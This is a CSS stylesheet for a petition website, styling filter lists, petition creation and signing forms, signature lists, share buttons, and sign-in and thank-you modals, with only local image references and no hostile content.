ul.filter-list li.search {
background: url(../img/sprite-circle-icons.png) no-repeat 42px 0; }
.response-filter ul.filter-list li.search {
background: url(../img/sprite-circle-icons.png) no-repeat 42px -65px; }
ul.filter-list li.search .popup-title:hover {
background: url(../img/sprite-circle-icons.png) no-repeat 42px -30px;
color: #000; }
.petition-filter ul.filter-list a,
.response-filter ul.filter-list a {
color: #535353; }
.petition-filter ul.select-view li.active a,
.response-filter ul.select-view li.active a,
.response-filter ul.select-view li.active div {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
border: 1px solid #a8a8a8;
background: #e5e5e5;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#e5e5e5', endColorstr='#f2f2f2');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#e5e5e5), to(#f2f2f2));
/* for webkit browsers */
background: -moz-linear-gradient(top, #e5e5e5, #f2f2f2);
/* for firefox 3.6+ */
-moz-box-shadow: inset 1px 1px 1px 1px #b9b9b9;
-webkit-box-shadow: inset 1px 1px 1px 1px #b9b9b9;
box-shadow: inset 1px 1px 1px 1px #b9b9b9; }
.petition-filter ul.select-view li.active a:hover,
.response-filter ul.select-view li.active a:hover {
color: #535353; }
li.view-two-column a, li.view-one-column a {
display: block;
text-indent: -9000px;
width: 20px;
height: 20px;
margin: 8px 10px 0 0; }
li.view-two-column a.active, li.view-two-column a.active:hover {
background: url(../img/icons-filter-view.gif) no-repeat -73px 0; }
li.view-two-column a {
background: url(../img/icons-filter-view.gif) no-repeat 0 0; }
li.view-one-column a.active, li.view-one-column a.active:hover {
background: url(../img/icons-filter-view.gif) no-repeat -28px 0;
margin-right: 30px; }
.response-filter li.view-two-column a.active, .response-filter li.view-two-column a.active:hover {
background: url(../img/icons-filter-view.gif) no-repeat -170px 0; }
.response-filter li.view-one-column a.active {
background: url(../img/icons-filter-view.gif) no-repeat -139px 0; }
li.view-one-column a {
background: url(../img/icons-filter-view.gif) no-repeat -101px 0;
margin-right: 30px; }
li.view-two-column a:hover {
background: url(../img/icons-filter-view.gif) no-repeat -202px 0; }
li.view-one-column a:hover {
background: url(../img/icons-filter-view.gif) no-repeat -230px 0;
margin-right: 30px; }
.basic-text-block p {
margin: 0 0 25px 0;
font-size: 1.25em;
line-height: 160%; }
.basic-text-block {
padding: 0 15px; }
.social-media-options {
margin: 35px 0 0 0; }
.social-media-options div.options-box, .social-media-options a {
display: block;
width: 157px;
height: 63px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
border: 1px solid #c5c5c5;
text-align: center;
color: #737373;
font-weight: bold;
padding: 5px 0 0 0;
font-size: 1.083em;
-moz-box-shadow: 0 0 3px #ececec;
-webkit-box-shadow: 0 0 3px #ececec;
box-shadow: 0 0 3px #ececec;
float: left;
margin-right: 12px; }
.social-media-options hover {
border: 1px solid #b4b4b4;
color: #336699; }
.social-media-options #twitter a {
background: white url(../img/soc-media-graphics.gif) no-repeat 7px 19px; }
.social-media-options #fb a {
background: white url(../img/soc-media-graphics.gif) no-repeat 5px -65px; }
.social-media-options #email a {
background: white url(../img/soc-media-graphics.gif) no-repeat 7px -157px; }
.button-email-this-petition {
background: url(../img/sprite-buttons.png) no-repeat 0 -714px;
width: 205px;
height: 32px;
margin: 20px 0 0 0;
display: block;
float: left;
text-indent: -9000px;
cursor: pointer; }
/* Tool Tip */
#petition-inner .tooltip {
min-height: 5px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
padding: 5px 10px;
width: 230px;
border: 1px solid #dbdbdb;
position: relative;
color: #818181;
font-size: .917em;
font-weight: bold;
position: absolute;
top: 26px;
left: 415px;
line-height: 135%;
z-index: 50;
background: #fff;
/*display: none;*/ }
#petition-inner .tip-arrow {
position: absolute;
top: 23px;
left: -9px; }
#petition-inner .tip-arrow-up {
position: absolute;
top: -9px;
left: 20px; }
#petition-inner .tip-arrow-down {
left: 300px;
position: absolute;
top: 195px; }
#form-item-create-petition-tags .tooltip {
top: 8px; }
.tooltip a.view {
margin: 2px 0 0 0;
display: block; }
/* Form */
/* User Register form */
#petition-inner form {
padding: 0 15px 55px 15px; }
#petition-inner form label,
.modal form label {
color: #333;
font-weight: bold;
display: block;
margin-bottom: 10px; }
#form-item-create-petition-title {
margin-bottom: 20px; }
#petition-inner form textarea,
#petition-inner form input.input-text,
.modal form textarea,
.modal form input.input-text,
#sign-in input.input-text {
border: 1px solid #CCC;
border-bottom: 1px solid #e5e5e5;
background: #fdfdfd url(../img/bg-textarea.png) repeat-x;
font-size: 1.167em;
font-family: Arial, sans-serif;
color: #666;
padding: 5px;
width: 390px; }
#form-item-create-petition-description,
#form-item-create-petition-tags {
width: 400px; }
#form-item-create-petition-title .we-petition-msg {
color: #669900;
font-size: 1.4em;
text-transform: uppercase;
float: left;
width: 230px;
padding: 20px 0 0 0; }
#form-item-create-petition-description .tooltip {
height: 139px; }
#petition-inner .form-item {
position: relative; }
form#create-petition-form-step-1 textarea {
width: 410px;
height: 75px; }
form#create-petition-form-step-3 textarea {
width: 390px;
height: 250px; }
#petition-inner label.sub-label {
display: inline;
color: #737373;
font-size: 1em; }
form .help-text {
text-align: right;
color: #737373;
font-size: 0.833em; }
#petition-inner .help-text .view-some {
width: 200px;
float: left;
text-align: left;
font-size: 11px;
font-weight: bold; }
.help-text .character-limit {
float: right;
text-align: right;
font-size: 13px;
font-weight: bold; }
form#create-petition-form-step-1 .form-field-wrapper {
float: right;
width: 410px;
position: relative; }
img.form-arrow {
position: absolute;
top: 31px;
left: -14px; }
#form-item-issues-describe .form-item-checkbox {
margin-bottom: 5px; }
#form-item-issues-describe .group {
width: 215px;
float: left; }
.input-button-steps {
border: none;
cursor: pointer;
height: 34px;
text-indent: -9999px;
width: 280px;
font-size: 0;
line-height: 0;
position: absolute;
margin-bottom: 35px; }
input#continue-to-step-2 {
background: url(../img/sprite-buttons.png) no-repeat 0 -48px; }
input#continue-to-step-3 {
background: url(../img/sprite-buttons.png) no-repeat 0 -84px; }
input#continue-to-final-step {
background: url(../img/sprite-buttons.png) no-repeat 0 -121px;
width: 305px; }
/****** Right Rail ******/
h2.trigger {
background: #ececec;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ececec', endColorstr='#dcdcdc');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#ececec), to(gainsboro));
/* for webkit browsers */
background: -moz-linear-gradient(top, #ececec, gainsboro);
/* for firefox 3.6+ */
font-size: 1.083em;
height: 36px;
line-height: 36px;
padding: 0 15px;
border-bottom: 1px solid #FFF;
color: #737373;
display: block;
cursor: pointer; }
h2.trigger a {
color: #737373;
display: block; }
h2.trigger a:hover {
text-decoration: none;
color: #2d2d2d; }
h2.active a {
color: #fff; }
h2.trigger:hover {
color: #2d2d2d;
background: #d8d8d8;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#d8d8d8', endColorstr='#b4b4b4');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#d8d8d8), to(#b4b4b4));
/* for webkit browsers */
background: -moz-linear-gradient(top, #d8d8d8, #b4b4b4);
/* for firefox 3.6+ */ }
#qa-content h2.trigger {
background: none;
filter: none;
border-bottom: 1px solid #CCC; }
#qa-content h2.trigger.active, #qa-content h2.trigger.active:hover {
background: #a3a3a3;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#a3a3a3', endColorstr='#696969');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#a3a3a3), to(dimgrey));
/* for webkit browsers */
background: -moz-linear-gradient(top, #a3a3a3, dimgrey);
/* for firefox 3.6+ */ }
#qa-content h2.trigger.active a, #qa-content h2.trigger.active a:hover {
color: #fff; }
#qa-content h2.trigger:hover {
color: #2d2d2d;
background: #d8d8d8;
filter: none;
background: -webkit-gradient(linear, left top, left bottom, from(#d8d8d8), to(#b4b4b4));
/* for webkit browsers */
background: -moz-linear-gradient(top, #d8d8d8, #b4b4b4);
/* for firefox 3.6+ */ }
#qa-content h2.trigger:hover {
background: #ececec;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ececec', endColorstr='#dcdcdc');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#ececec), to(gainsboro));
/* for webkit browsers */
background: -moz-linear-gradient(top, #ececec, gainsboro);
/* for firefox 3.6+ */ }
#qa-content h2.trigger a:hover {
color: #737373; }
.toggle-container {
background: #f6f6f6;
border: 1px solid #e8e8e8;
padding: 10px 15px;
color: #333;
word-wrap: break-word; }
#how-why-content #qa-content .toggle-container {
background: #f6f6f6;
border-bottom: 1px solid #e8e8e8; }
.toggle-container li {
list-style-type: none;
margin-bottom: 8px; }
.toggle-container a {
color: #333; }
#petition-inner .toggle-container a:hover {
color: #000;
text-decoration: underline; }
/*h2.trigger hover {text-decoration: none; color: #2d2d2d;}*/
h2.top-trigger {
border-top-right-radius: 5px;
-moz-border-radius-topright: 5px;
-webkit-border-radius-topright: 5px;
border-top-left-radius: 5px;
-moz-border-radius-topleft: 5px;
-webkit-border-radius-topleft: 5px; }
h2.bottom-trigger {
border-bottom-right-radius: 5px;
-moz-border-radius-bottomright: 5px;
-webkit-border-radius-bottomright: 5px;
border-bottom-left-radius: 5px;
-moz-border-radius-bottomleft: 5px;
-webkit-border-radius-bottomleft: 5px; }
h2.active {
background: #a3a3a3;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#a3a3a3', endColorstr='#696969');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#a3a3a3), to(dimgrey));
/* for webkit browsers */
background: -moz-linear-gradient(top, #a3a3a3, dimgrey);
/* for firefox 3.6+ */ }
#petition-inner .block-petitionssignatureform {
background: #ebebeb;
margin-bottom: 1em !important; }
#petition-inner .block-petitionssignatureform form {
padding: 0; }
#petition-inner .block-petitionssignatureform form .form-item:first-child {
margin-top: 0; }
#petition-inner .block-petitionssignatureform form label,
#petition-inner .block-petitionssignatureform form .privacy-container,
#petition-inner .block-petitionssignatureform form .note-container {
padding: 0;
color: #7a7a7a; }
#petition-inner .block-petitionssignatureform form label {
margin: 0; }
#petition-inner .block-petitionssignatureform form .privacy-container {
margin: 0 0 0 0; }
#petition-inner .block-petitionssignatureform form .note-container {
margin: 1em 0 0 0; }
#petition-inner .block-petitionssignatureform form .privacy-legend a,
#petition-inner .block-petitionssignatureform form .note-container a {
color: #004990; }
#petition-inner .block-petitionssignatureform form .form-type-checkbox label {
display: inline;
font-weight: normal;
line-height: 1.5; }
#petition-inner .block-petitionssignatureform form .form-text {
max-width: 201px;
border: 1px solid #cbcbcb;
height: 2em; }
#petition-inner .block-petitionssignatureform form .form-text.error {
border: 1px solid #c00; }
#petition-inner .block-petitionssignatureform form input.form-submit {
text-indent: 0px;
background-color: #af0208;
color: #fffaf8;
font-size: 1.3em;
font-weight: 600;
text-transform: uppercase;
width: 100%;
line-height: inherit;
height: inherit;
margin: inherit;
padding: 0.75em;
border: 1px solid #840202;
border-radius: 5px;
background: #8b0000;
background: -webkit-linear-gradient(#af0208, darkred);
background: -o-linear-gradient(#af0208, darkred);
background: -moz-linear-gradient(#af0208, darkred);
background: linear-gradient(#af0208, darkred); }
#petition-inner .block-petitionssignatureform .toggle-container {
background: none;
padding: 0px 15px 10px 15px; }
#petition-inner .block-petitionssignatureform h2,
#petition-inner .block-petitionssignatureform h2.top-trigger {
border-radius: 0;
background: none; }
#petition-inner .block-petitionssignatureform h2.trigger {
border-bottom: none;
padding-top: 6px; }
#petition-inner .block-petitionssignatureform h2 a,
#petition-inner .block-petitionssignatureform h2.active a {
color: #323232;
font-size: 1.5em; }
#petition-inner .block-petitionssignatureform .thank-you h2 {
color: #8C0402;
font-size: 1.5em; }
#petition-inner .block-petitionssignatureform .thank-you h3 {
color: #8C0402;
font-size: 105%;
font-weight: normal; }
/****** Individual Petition Page ******/
a#button-sign-this-petition {
background: url(../img/sprite-buttons.png) no-repeat -252px -250px;
width: 245px;
height: 33px;
margin: 25px 0px;
display: block;
float: left;
text-indent: -9000px;
cursor: pointer; }
a#button-sign-this-petition-inactive {
background: url(../img/sprite-buttons.png) no-repeat 0 -756px;
width: 210px;
height: 34px;
margin: 10px 0 0 0;
display: block;
float: left;
text-indent: -9000px;
cursor: pointer; }
#sign-this-petition {
min-height: 69px; }
#signed-by-user #sign-this-petition {
min-height: 62px; }
#sign-this-petition h3, #signed-by-user #sign-this-petition h3 {
color: #669900;
/*float: left;*/
font-size: 1em;
margin: 15px 0 0;
width: 150px; }
#signed-by-user #sign-this-petition h3 {
width: auto;
margin: 10px 0 6px 0;
float: none;
font-size: 1.333em;
font-weight: bold; }
a#button-sign-this-petition:hover {
background: url(../img/sprite-buttons.png) no-repeat -252px -283px; }
a#button-sign-this-petition:active {
background: url(../img/sprite-buttons.png) no-repeat -252px -316px; }
#sign-this-petition h3 {
color: #333;
font-size: 1.167em;
font-weight: normal;
width: auto; }
#sign-this-petition .col-left {
width: 250px;
float: left; }
#sign-this-petition .col-right {
width: 410px;
float: left;
position: relative; }
#sign-this-petition a#button-sign-in, #sign-in-or-create-account a#button-sign-in {
background: url(../img/sprite-buttons.png) no-repeat -236px -757px;
width: 95px;
height: 33px;
margin: 7px 0 0 0;
display: block;
float: left;
text-indent: -9000px;
cursor: pointer; }
#sign-this-petition .or {
height: 32px;
margin: 9px 0;
float: left;
text-indent: -9000px;
width: 40px;
background: url(../img/sprite-buttons.png) no-repeat -230px -805px; }
#sign-this-petition a#button-create-an-account, #sign-in-or-create-account a#button-create-an-account {
background: url(../img/sprite-buttons.png) no-repeat 0 -801px;
width: 191px;
height: 34px;
margin: 7px 0 0 0;
display: block;
float: left;
text-indent: -9000px;
cursor: pointer; }
#why-overlay {
background: url(../img/bg-why-signin-overlay.png) no-repeat;
height: 152px;
padding: 20px 20px 5px 20px;
position: absolute;
top: -164px;
width: 360px;
z-index: 500;
left: -10px; }
#why-overlay p {
color: #818181;
font-size: 0.917em;
font-weight: bold;
line-height: 1.5; }
#why-overlay-text {
color: #336699;
cursor: pointer;
font-size: 1.167em;
margin-top: 17px;
display: inline-block; }
#sign-this-petition .col-right h3 {
width: 350px;
float: left; }
form#form-sign-this-petition {
background: url(../img/sprite.gif) no-repeat 0 -1027px;
min-height: 118px;
position: relative;
margin: 0;
padding-bottom: 20px; }
form#form-sign-this-petition textarea#add-comment-with-sig {
border: none;
float: none;
width: 630px;
height: 60px;
margin: 2px 0 0 0;
padding: 8px 0 0 0; }
#petition-inner form#form-sign-this-petition .character-limit {
float: right;
color: #939393;
margin: 12px 15px 0 0;
font-size: 1em; }
#share-this-petition {
background: url(../img/sprite.gif) no-repeat 0 -1157px;
height: 34px;
padding: 26px 15px 0 15px;
margin-left: -15px; }
#share-this-petition ul li,
#thank-you-modal ul.share-this-petition li {
list-style-type: none;
float: left; }
#share-this-petition li.title {
font-weight: bold;
color: #292929;
font-family: Arial, sans-serif;
font-size: 1em;
margin: 7px 7px 0 0; }
#share-this-petition .report-petition {
text-align: right;
float: right;
width: 230px;
font-weight: bold;
text-indent: -9000px;
margin: 8px 0 0 0;
position: relative; }
#share-this-petition .report-petition #report-inappropriate-link {
color: #880000;
text-shadow: 0 1px 0 #f0f0f0;
cursor: pointer; }
/* Report Petition Overlay */
#report-petition-overlay {
background: url(../img/bg-report-petition-overlay.png) no-repeat;
height: 190px;
left: -120px;
padding: 10px 10px 0 0;
position: absolute;
top: -203px;
width: 500px;
z-index: 500; }
#report-petition-overlay p {
font-weight: normal; }
.delete-petition-overlay {
padding: 10px 10px 0 0;
z-index: 500;
position: absolute;
-moz-box-shadow: 0 0 3px #000000;
-webkit-box-shadow: 0 0 3px #000000;
box-shadow: 0 0 3px #000000;
background: #FFF;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
height: 180px;
width: 450px;
top: 0px; }
.delete-insert {
position: relative; }
.delete-petition-overlay .buttons {
text-indent: -9000px; }
.petition-detail-publish-options .delete-petition-overlay {
left: -300px;
top: -200px; }
#share-this-petition #report-petition-overlay .entry, .delete-petition-overlay .wrap {
text-align: left;
text-indent: 0;
margin: 10px 30px; }
#share-this-petition #report-petition-overlay .entry p, .delete-petition-overlay .wrap p {
font-weight: normal;
margin: 0;
line-height: 140%; }
.delete-petition-overlay {
text-align: right;
z-index: 500; }
#share-this-petition h2 {
margin-bottom: 9px; }
input#button-report-this-petition {
background: url(../img/sprite-buttons.png) no-repeat 0 -584px;
display: block;
height: 25px;
width: 170px;
text-indent: -9000px;
margin: 15px 0 0 0;
cursor: pointer; }
#share-this-petition li.share-link,
#share-this-petition li.share-link a,
#thank-you-modal ul.share-this-petition li.share-link,
#thank-you-modal ul.share-this-petition li.share-link a {
display: block;
width: 91px;
height: 27px;
text-indent: -9000px; }
#share-this-petition li.email a,
#thank-you-modal ul.share-this-petition li.email a {
background: url(../img/sprite-buttons.png) no-repeat -217px -369px;
height: 26px; }
#share-this-petition li.email a:hover,
#thank-you-modal ul.share-this-petition li.email a:hover {
background: url(../img/sprite-buttons.png) no-repeat -217px -395px; }
#share-this-petition li.email a:active,
#thank-you-modal ul.share-this-petition li.email a:active {
background: url(../img/sprite-buttons.png) no-repeat -217px -423px; }
#share-this-petition li.twitter a,
#thank-you-modal ul.share-this-petition li.twitter a {
background: url(../img/sprite-buttons.png) no-repeat -310px -370px;
height: 26px; }
#share-this-petition li.twitter a:hover,
#thank-you-modal ul.share-this-petition li.twitter a:hover {
background: url(../img/sprite-buttons.png) no-repeat -310px -396px; }
#share-this-petition li.twitter a:active,
#thank-you-modal ul.share-this-petition li.twitter a:active {
background: url(../img/sprite-buttons.png) no-repeat -310px -423px; }
#share-this-petition li.facebook a,
#thank-you-modal ul.share-this-petition li.facebook a {
background: url(../img/sprite-buttons.png) no-repeat -402px -370px;
width: 95px;
height: 26px; }
#share-this-petition li.facebook a:hover,
#thank-you-modal ul.share-this-petition li.facebook a:hover {
background: url(../img/sprite-buttons.png) no-repeat -402px -396px; }
#share-this-petition li.facebook a:active,
#thank-you-modal ul.share-this-petition li.facebook a:active {
background: url(../img/sprite-buttons.png) no-repeat -402px -423px; }
.divide-green-fuz {
background: url(../img/divide-green-fuz.gif) repeat-x;
height: 12px; }
#petitions-individual #share-this-petition {
margin-bottom: 20px; }
#petitions-individual .petition-detail .divide-green-fuz {
margin-left: -15px; }
#petitions-individual h4 {
margin: 3px 0 5px 0; }
#signature-list {
margin-left: -15px;
margin-top: 20px; }
#signature-list .numbers {
font-weight: bold;
font-size: 1.167em;
margin: 5px 0 12px 0; }
#signature-list .entry {
width: 126px;
height: 108px;
padding: 18px 17px;
line-height: 130%;
float: left;
margin-right: 15px;
background: url(../img/bg-sig.gif) no-repeat -336px 0;
position: relative; }
#signature-list .entry .details {
margin-bottom: 5px; }
#signature-list .entry-creator {
background: url(../img/bg-sig.gif) no-repeat 0 0;
color: #FFF; }
#signature-list .entry-creator .title {
font-size: 1.25em;
font-family: Georgia, serif;
text-transform: uppercase;
margin: 0 0 3px 0; }
#signature-list .entry-reg .name,
#signature-list .entry-you-signed .name {
color: #000;
font-family: Georgia, serif;
font-size: 1.25em;
margin: 0 0 4px 0; }
#signature-list .entry-you-signed {
background: url(../img/bg-sig.gif) no-repeat -168px 0;
color: #FFF; }
#signature-list .read-comment {
font-weight: bold;
color: #336699;
margin: 0px;
cursor: pointer; }
#signature-list .entry-you-signed .name {
color: #FFF; }
#signature-list .last {
margin-right: 0; }
#signature-list .load-next {
width: 126px;
height: 103px;
padding: 18px 17px;
line-height: 130%;
float: left;
background: url(../img/bg-load-next-sig.gif) no-repeat;
font-weight: bold;
font-size: 1.333em;
color: #669900;
display: block;
padding-top: 28px;
cursor: pointer; }
#signature-list .comment-popup {
width: 301px;
position: absolute;
font-weight: normal;
z-index: 500;
bottom: 98px;
height: 135px; }
#signature-list .comment-popup .top {
background: url(../img/bg-comment-bubble-top.png) no-repeat bottom;
height: 13px; }
#signature-list .comment-popup .mid {
background: url(../img/bg-comment-bubble-mid.png) repeat-y;
padding: 5px 22px 10px 22px;
color: #737373;
font-size: 1em;
line-height: 140%;
height: 100px;
word-wrap: break-word; }
#signature-list .comment-popup .bottom {
background: url(../img/bg-comment-bubble-btm.png) no-repeat;
height: 22px; }
/****** Delete Modal ******/
.modal {
z-index: 100;
position: absolute;
-moz-box-shadow: 0 0 3px #000000;
-webkit-box-shadow: 0 0 3px #000000;
box-shadow: 0 0 3px #000000; }
.modal h2 {
font-size: 1.333em;
margin: 0 0 10px 0; }
h2.alert {
color: #880000;
font-size: 1.333em;
margin: 0 0 10px 0; }
.delete-petition-overlay .buttons {
margin: 10px 0 0 30px;
text-indent: -9000px; }
#petition-thankyou .petition-detail {
padding: 0 0 25px 0; }
input#button-delete-this-petition, a#button-delete-this-petition {
background: url(../img/sprite-buttons.png) no-repeat 0 -463px;
height: 27px;
display: block;
width: 171px;
text-indent: -9000px;
float: left;
margin-right: 10px;
-webkit-appearance: none !important; }
input#button-no-thanks-keep, a#button-no-thanks-keep {
background: url(../img/sprite-buttons.png) no-repeat 0 -497px;
height: 27px;
display: block;
width: 217px;
text-indent: -9000px;
float: left;
font-size: 0;
line-height: 0; }
.modal p {
line-height: 140%; }
#filter-page #wh-petitions-comment-petition-form p {
clear: both;
margin-top: 20px;
padding-top: 20px; }
/****** Thank You Modal ******/
#thank-you-modal {
background: #FFF;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
min-height: 390px;
position: absolute;
width: 637px;
padding: 7px 7px 0 7px;
z-index: 500; }
#thank-you-modal .inner {
padding: 15px 15px 55px 15px; }
#thank-you-modal .header {
height: 51px; }
#thank-you-modal p {
margin: 20px 0 20px 0; }
#thank-you-modal #sig-needed {
margin-right: 5px;
width: 280px; }
#thank-you-modal #sig-needed .num-block1 {
margin-right: 5px; }
#thank-you-modal #total-on {
width: 300px; }
#thank-you-modal #total-on h4 {
margin-right: 0px;
padding-right: 0px;
width: 125px; }
#thank-you-modal #total-on .num-block2 {
left: 437px; }
#petition-inner #thank-you-modal textarea {
width: 570px;
height: 90px; }
input.blue-button,
a.blue-button, .response-filter #issues-filter-drop input.blue-button {
background: #003366;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#336699', endColorstr='#003366');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#336699), to(#003366));
/* for webkit browsers */
background: -moz-linear-gradient(top, #336699, #003366);
/* for firefox 3.6+ */
border: none;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
color: #FFF;
text-transform: uppercase;
padding: 4px 15px;
text-align: center;
font-family: Arial, sans-serif;
font-weight: bold;
letter-spacing: 0.03em;
cursor: pointer; }
.response-filter #issues-filter-drop input.blue-button {
width: 170px;
padding: 8px 0;
margin: 15px 0 0 220px;
font-size: 1em; }
input#submit-comment-with-sig {
margin: 5px 0 0 0; }
#petition-inner #thank-you-modal form .help-text {
font-size: 1em;
float: right;
position: absolute;
left: 375px;
width: 200px;
margin: 5px 0 0 0; }
/****** Petition Response ******/
.petition-response {
background: #f6f6dc;
padding: 20px 20px 10px 20px;
margin: 30px 0 20px -15px;
border: 1px solid #e3e3e3;
-moz-border-radius-topright: 5px;
border-top-right-radius: 5px;
-webkit-border-radius-topright: 5px;
-moz-border-radius-topleft: 5px;
border-top-left-radius: 5px;
-webkit-border-radius-topleft: 5px; }
.individual-response {
background: #dbecfc;
border: none;
margin: 0 0 0 -15px;
padding: 7px 20px 20px 20px; }
.petition-response .media {
margin: 0 0 15px 0;
word-wrap: break-word; }
.petition-response p {
word-wrap: break-word; }
.petition-response h2 {
font-weight: normal;
font-size: 1.833em; }
img.response-call {
position: absolute;
top: -19px;
left: 23px; }
.response-author-org span {
display: block; }
.response-author-org img.graphic {
float: left;
padding: 0 8px 0 0; }
.response-author-org span.official {
text-transform: uppercase;
font-size: 0.917em;
font-weight: bold;
letter-spacing: 0.02em;
padding: 12px 0 0 0; }
.response-author-org span.petition-title {
font-size: 1.25em;
margin: 2px 0 0 1px; }
.response-applies-msg {
margin: 28px 0 10px 0;
font-weight: bold; }
/****** Sign Petition and Create Account Modal ******/
#sign-create-modal {
background: #FFF;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
min-height: 390px;
width: 763px;
left: 350px;
top: 120px;
padding: 7px 7px 25px 7px; }
#sign-create-modal .inner {
padding: 0 20px 55px 20px; }
#sign-create-modal .header h2 {
width: 500px;
float: left; }
#sign-create-modal p,
#create-account-not-signed-in p {
margin: 0;
font-size: 1em;
color: #737373; }
#sign-create-modal .form-item {
margin: 0 0 8px 0; }
#sign-create-modal .header {
height: 55px;
background: url(../img/sprite.gif) no-repeat 0 -1243px; }
#sign-create-modal .header a.close-button {
margin: 4px 15px 0 0;
padding: 2px 0 3px 0; }
#sign-create-modal .col-2, #sign-create-modal .or,
#create-account-not-signed-in .or {
float: left; }
#create-account-not-signed-in .or {
float: left; }
#sign-create-modal #have-account {
width: 285px; }
#create-account-not-signed-in #have-account {
width: 260px;
float: left; }
#petition-inner #create-account-not-signed-in .form-item {
margin-bottom: 10px; }
#sign-create-modal #no-account {
width: 360px; }
#create-account-not-signed-in #no-account {
width: 350px;
float: left;
padding-left: 10px; }
#no-account form {
margin: 15px 0 0 0;
padding: 0; }
#sign-create-modal .form-item-checkbox label,
#petition-inner #create-account-not-signed-in .form-item-checkbox label {
display: inline;
width: auto;
float: none;
font-weight: normal; }
#create-account-not-signed-in {
margin: 2px 0 0 2px; }
#create-account-not-signed-in #no-account .form-item-checkbox {
margin: 0 40px 10px 90px; }
#create-account-not-signed-in .note {
color: #880000;
font-size: 1em;
margin: 15px 0 10px; }
#sign-create-modal .or,
#create-account-not-signed-in .or {
width: 40px;
padding: 125px 0;
margin: 0 20px 0 10px;
background: url(../img/line-gr.gif) repeat-y center;
min-height: 88px; }
#create-account-not-signed-in .or {
margin: 0 10px;
padding: 145px 0 180px 0; }
#sign-create-modal input.input-text,
#sign-in input.input-text,
#petition-inner #create-account-not-signed-in input.input-text {
background: white url(../img/bg-input-text.gif) repeat-x;
border: 1px solid #e5e5e5;
color: #7b7b7b;
font-size: 1em; }
#sign-in input.input-text {
width: 160px;
height: 17px; }
#form-item-password .help-text {
margin-top: 4px;
font-size: 0.917em; }
#have-account input.input-text {
width: 170px; }
#petition-inner #have-account form input.input-text {
width: 150px; }
#petition-inner #have-account form {
padding: 0; }
#no-account input.input-text,
#petition-outer #create-account-not-signed-in input.input-text {
width: 120px; }
#sign-create-modal label,
#petition-outer #create-account-not-signed-in label {
color: #7b7b7b;
font-size: 1em;
margin: 0;
float: left;
width: 100px;
display: block;
padding: 6px 0 0 0; }
#petition-outer #create-account-not-signed-in label {
width: 90px; }
#sign-create-modal h3,
#create-account-not-signed-in h3 {
font-weight: normal;
font-size: 1.5em;
margin: 0 0 7px 0; }
#sign-create-modal h4,
#create-account-not-signed-in h4 {
text-transform: none;
font-size: 1.167em;
margin: 0 0 10px 0; }
#create-account-not-signed-in h4 {
font-size: 1.083em;
margin: 10px 0 14px 0; }
#sign-create-modal input.sign-in-button,
#create-account-not-signed-in input.sign-in-button {
height: 34px;
display: block;
border: none;
line-height: 0;
cursor: pointer;
clear: both;
text-indent: -9000px; }
#no-account #form-item-first-last-name input.input-text {
width: 115px; }
#sign-create-modal .form-item-checkbox {
margin: 0 0 20px 95px;
float: right;
width: auto;
line-height: 140%; }
#sign-create-modal #updates-check,
#create-account-not-signed-in #updates-check {
float: left; }
#create-account-not-signed-in #updates-check {
margin: 2px 10px 20px 0; }
a.open-id-signin {
background: url(../img/icon-openid.gif) no-repeat 0 0;
padding: 0 0 0 20px;
margin: 10px 0 0 0;
display: block; }
#sign-create-modal p.guide-privacy-links,
#create-account-not-signed-in p.guide-privacy-links {
margin: 10px 0 0 0;
font-size: 1.083em; }
#no-account #form-item-email-create input.input-text,
#no-account #form-item-reenter-email input.input-text {
width: 245px; }
#no-account label {
width: 100px; }
input#button-sign-in-and-start-my-petition {
background: url(../img/sprite-buttons.png) no-repeat 0 -637px;
width: 247px;
margin: 26px 0 0 0; }
input#button-submit-and-start-my-petition {
background: url(../img/sprite-buttons.png) no-repeat -250px -637px;
width: 250px;
margin: 0; }
input#button-sign-petition-and-create {
background: url(../img/sprite-buttons.png) no-repeat 0 -537px;
width: 316px; }
/****** How Why Pages ******/
/* Left Nav */
#how-why-content .left-nav li {
list-style-type: none;
margin: 0 0 3px 0;
display: block;
padding: 0 5px;
font-weight: bold;
font-size: 1.083em; }
#how-why-content .left-nav li a {
color: #737373;
display: block;
height: 23px;
padding: 7px 0 0 6px; }
#how-why-content .left-nav li a.active {
color: #333;
background: url(../img/bg-left-nav-active.png) no-repeat -1px 0; }
#how-why-content .left-nav li a:hover {
color: #333; }
#how-why-content blockquote {
margin: 0 0 20px 0; }
#how-why-content p {
margin: 0 0 20px 0; }
#how-why-content blockquote p {
font-family: Georgia, serif;
font-size: 1.417em;
line-height: 150%;
margin: 0px;
padding: 0; }
#how-why-content p a {
text-decoration: underline; }
#how-why-content .step {
clear: both; }
#how-why-content .step .num {
width: 31px;
height: 33px;
float: left;
margin: 0 15px 0 0;
text-indent: -9000px; }
.step-text h3 {
margin-bottom: 10px; }
#how-why-content p.sub-step {
margin-left: 45px; }
#how-why-content .step-text {
float: left;
width: 650px; }
#how-why-content #step-1 .num {
background: url(../img/how-to-numbers.gif) no-repeat; }
#how-why-content #step-2 .num {
background: url(../img/how-to-numbers.gif) no-repeat 0 -51px; }
#how-why-content #step-3 .num {
background: url(../img/how-to-numbers.gif) no-repeat 0 -102px; }
#how-why-content #step-4 .num {
background: url(../img/how-to-numbers.gif) no-repeat 0 -156px; }
#how-why-content p a:hover {
text-decoration: none; }
